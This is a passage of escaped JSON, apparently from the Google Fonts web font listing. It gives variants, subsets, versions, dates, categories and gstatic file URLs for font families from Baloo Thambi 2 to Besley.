],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tamil\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/baloothambi2/v16/cY9RfjeOW0NHpmOQXranrbDyu5JMJmNp-aDvUBbKzcIzaQRG_n4osQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/baloothambi2/v16/cY9RfjeOW0NHpmOQXranrbDyu5JMJmNp-aDvUBbK_8IzaQRG_n4osQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/baloothambi2/v16/cY9RfjeOW0NHpmOQXranrbDyu5JMJmNp-aDvUBbKE8UzaQRG_n4osQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/baloothambi2/v16/cY9RfjeOW0NHpmOQXranrbDyu5JMJmNp-aDvUBbKKsUzaQRG_n4osQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/baloothambi2/v16/cY9RfjeOW0NHpmOQXranrbDyu5JMJmNp-aDvUBbKTcUzaQRG_n4osQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Balsamiq Sans\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/balsamiqsans/v10/P5sEzZiAbNrN8SB3lQQX7Pnc8dkdIYdNHzs.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/balsamiqsans/v10/P5sazZiAbNrN8SB3lQQX7PncwdsXJaVIDzvcXA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/balsamiqsans/v10/P5sZzZiAbNrN8SB3lQQX7PncyWUyBY9mAzLFRQI.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/balsamiqsans/v10/P5sfzZiAbNrN8SB3lQQX7PncwdsvmYpsBxDAVQI4aA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Balthazar\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/balthazar/v17/d6lKkaajS8Gm4CVQjFEvyRTo39l8hw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bangers\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bangers/v20/FeVQS0BTqb0h60ACL5la2bxii28.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Barlow\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/barlow/v12/7cHrv4kjgoGqM7E3b8s8yn4hnCci.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/barlow/v12/7cHtv4kjgoGqM7E_CfNYwHoDmTcibrA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E3w-oc4FAtlT47dw.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/barlow/v12/7cHsv4kjgoGqM7E_CfP04Voptzsrd6m9.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E3p-kc4FAtlT47dw.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/barlow/v12/7cHsv4kjgoGqM7E_CfOQ4loptzsrd6m9.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/barlow/v12/7cHpv4kjgoGqM7EPC8E46HsxnA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/barlow/v12/7cHrv4kjgoGqM7E_Ccs8yn4hnCci.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E3_-gc4FAtlT47dw.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/barlow/v12/7cHsv4kjgoGqM7E_CfPI41optzsrd6m9.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E30-8c4FAtlT47dw.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/barlow/v12/7cHsv4kjgoGqM7E_CfPk5Foptzsrd6m9.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E3t-4c4FAtlT47dw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/barlow/v12/7cHsv4kjgoGqM7E_CfOA5Voptzsrd6m9.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E3q-0c4FAtlT47dw.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/barlow/v12/7cHsv4kjgoGqM7E_CfOc5loptzsrd6m9.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/barlow/v12/7cHqv4kjgoGqM7E3j-wc4FAtlT47dw.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/barlow/v12/7cHsv4kjgoGqM7E_CfO451optzsrd6m9.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Barlow Condensed\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxxL3I-JCGChYJ8VI-L6OO_au7B43LT31vytKgbaw.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxzL3I-JCGChYJ8VI-L6OO_au7B6xTru1H2lq0La6JN.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxwL3I-JCGChYJ8VI-L6OO_au7B497y_3HcuKECcrs.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrF3DWvIMHYrtUxg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxwL3I-JCGChYJ8VI-L6OO_au7B47rx_3HcuKECcrs.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrc3PWvIMHYrtUxg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTx3L3I-JCGChYJ8VI-L6OO_au7B2xbZ23n3pKg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxxL3I-JCGChYJ8VI-L6OO_au7B6xTT31vytKgbaw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxwL3I-JCGChYJ8VI-L6OO_au7B4-Lw_3HcuKECcrs.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrK3LWvIMHYrtUxg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxwL3I-JCGChYJ8VI-L6OO_au7B4873_3HcuKECcrs.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrB3XWvIMHYrtUxg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxwL3I-JCGChYJ8VI-L6OO_au7B46r2_3HcuKECcrs.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrY3TWvIMHYrtUxg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxwL3I-JCGChYJ8VI-L6OO_au7B47b1_3HcuKECcrs.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrf3fWvIMHYrtUxg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxwL3I-JCGChYJ8VI-L6OO_au7B45L0_3HcuKECcrs.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/barlowcondensed/v12/HTxyL3I-JCGChYJ8VI-L6OO_au7B6xTrW3bWvIMHYrtUxg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Barlow Semi Condensed\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlphgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRfG4qvKk8ogoSP.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpjgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbLLIEsKh5SPZWs.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRft6uPAGEki52WfA.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbJnAWsgqZiGfHK5.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRf06iPAGEki52WfA.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbIDAmsgqZiGfHK5.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpvgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRnf4CrCEo4gg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlphgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfYqvKk8ogoSP.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRfi6mPAGEki52WfA.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbJbA2sgqZiGfHK5.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRfp66PAGEki52WfA.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbJ3BGsgqZiGfHK5.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRfw6-PAGEki52WfA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbITBWsgqZiGfHK5.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRf36yPAGEki52WfA.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbIPBmsgqZiGfHK5.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpigxjLBV1hqnzfr-F8sEYMB0Yybp0mudRf-62PAGEki52WfA.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/barlowsemicondensed/v14/wlpkgxjLBV1hqnzfr-F8sEYMB0Yybp0mudRXfbIrB2sgqZiGfHK5.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Barriecito\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/barriecito/v17/WWXXlj-CbBOSLY2QTuY_KdUiYwTO0MU.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Barrio\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/barrio/v19/wEO8EBXBk8hBIDiEdQYhWdsX1Q.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Basic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/basic/v17/xfu_0WLxV2_XKQN34lDVyR7D.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Baskervville\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2023-01-18\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/baskervville/v14/YA9Ur0yU4l_XOrogbkun3kQgt5OohvbJ9A.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/baskervville/v14/YA9Kr0yU4l_XOrogbkun3kQQtZmspPPZ9Mlt.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Battambang\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-04-20\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/battambang/v24/uk-kEGe7raEw-HjkzZabNhGp5w50_o9T7Q.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/battambang/v24/uk-lEGe7raEw-HjkzZabNtmLxyRa8oZK9I0.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/battambang/v24/uk-mEGe7raEw-HjkzZabDnWj4yxx7o8.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/battambang/v24/uk-lEGe7raEw-HjkzZabNsmMxyRa8oZK9I0.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/battambang/v24/uk-lEGe7raEw-HjkzZabNvGOxyRa8oZK9I0.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Baumans\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-04-20\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/baumans/v17/-W_-XJj9QyTd3QfpR_oyaksqY5Q.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bayon\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v29\",\n      \"lastModified\": \"2022-04-20\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bayon/v29/9XUrlJNmn0LPFl-pOhYEd2NJ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Be Vietnam Pro\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVNSTAyLFyeg_IDWvOJmVES_HRUBX8YYbAiah8.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVLSTAyLFyeg_IDWvOJmVES_HwyPRsSZZIneh-waA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVMSTAyLFyeg_IDWvOJmVES_HT4JF8yT7wrcwap.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVKSTAyLFyeg_IDWvOJmVES_HwyPbczRbgJdhapcUU.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVMSTAyLFyeg_IDWvOJmVES_HScJ18yT7wrcwap.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVKSTAyLFyeg_IDWvOJmVES_HwyPdMwRbgJdhapcUU.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVPSTAyLFyeg_IDWvOJmVES_EwwD3s6ZKAi.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVNSTAyLFyeg_IDWvOJmVES_HwyBX8YYbAiah8.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVMSTAyLFyeg_IDWvOJmVES_HTEJl8yT7wrcwap.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVKSTAyLFyeg_IDWvOJmVES_HwyPYsxRbgJdhapcUU.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVMSTAyLFyeg_IDWvOJmVES_HToIV8yT7wrcwap.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVKSTAyLFyeg_IDWvOJmVES_HwyPac2RbgJdhapcUU.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVMSTAyLFyeg_IDWvOJmVES_HSMIF8yT7wrcwap.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVKSTAyLFyeg_IDWvOJmVES_HwyPcM3RbgJdhapcUU.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVMSTAyLFyeg_IDWvOJmVES_HSQI18yT7wrcwap.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVKSTAyLFyeg_IDWvOJmVES_HwyPd80RbgJdhapcUU.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVMSTAyLFyeg_IDWvOJmVES_HS0Il8yT7wrcwap.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/bevietnampro/v10/QdVKSTAyLFyeg_IDWvOJmVES_HwyPfs1RbgJdhapcUU.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Beau Rivage\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/beaurivage/v2/UcCi3FIgIG2bH4mMNWJUlmg3NZp8K2sL.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bebas Neue\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bebasneue/v9/JTUSjIg69CK48gW7PXooxW5rygbi49c.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Belgrano\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/belgrano/v18/55xvey5tM9rwKWrJZcMFirl08KDJ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bellefair\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bellefair/v14/kJExBuYY6AAuhiXUxG19__A2pOdvDA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Belleza\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/belleza/v17/0nkoC9_pNeMfhX4BtcbyawzruP8.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bellota\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/bellota/v16/MwQzbhXl3_qEpiwAID55kGMViblPtXs.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/bellota/v16/MwQxbhXl3_qEpiwAKJBjHGEfjZtKpXulTQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/bellota/v16/MwQ2bhXl3_qEpiwAGJJRtGs-lbA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/bellota/v16/MwQ0bhXl3_qEpiwAKJBbsEk7hbBWrA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bellota/v16/MwQzbhXl3_qEpiwAIC5-kGMViblPtXs.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/bellota/v16/MwQxbhXl3_qEpiwAKJBjDGYfjZtKpXulTQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bellota Text\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/bellotatext/v16/0FlMVP2VnlWS4f3-UE9hHXM5VfsqfQXwQy6yxg.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/bellotatext/v16/0FlOVP2VnlWS4f3-UE9hHXMx--Gmfw_0YSuixmYK.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/bellotatext/v16/0FlTVP2VnlWS4f3-UE9hHXMB-dMOdS7sSg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/bellotatext/v16/0FlNVP2VnlWS4f3-UE9hHXMx-9kKVyv8Sjer.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/bellotatext/v16/0FlMVP2VnlWS4f3-UE9hHXM5RfwqfQXwQy6yxg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/bellotatext/v16/0FlOVP2VnlWS4f3-UE9hHXMx--G2eA_0YSuixmYK.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"BenchNine\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/benchnine/v16/ahcev8612zF4jxrwMosT--tRhWa8q0v8ag.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/benchnine/v16/ahcbv8612zF4jxrwMosrV8N1jU2gog.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/benchnine/v16/ahcev8612zF4jxrwMosT6-xRhWa8q0v8ag.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Benne\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"kannada\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/benne/v22/L0xzDFAhn18E6Vjxlt6qTDBN.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Bentham\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/bentham/v18/VdGeAZQPEpYfmHglKWw7CJaK_y4.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Berkshire Swash\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/berkshireswash/v16/ptRRTi-cavZOGqCvnNJDl5m5XmNPrcQybX4pQA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Besley\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/besley/v12/PlIhFlO1MaNwaNGWUC92IOH_mtG4fbbBSdRoFPOl8-E.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/besley/v12/PlIhFlO1MaNwaNGWUC92IOH_mtG4fYTBSdRoFPOl8-E.ttf\",\n        \"600\": 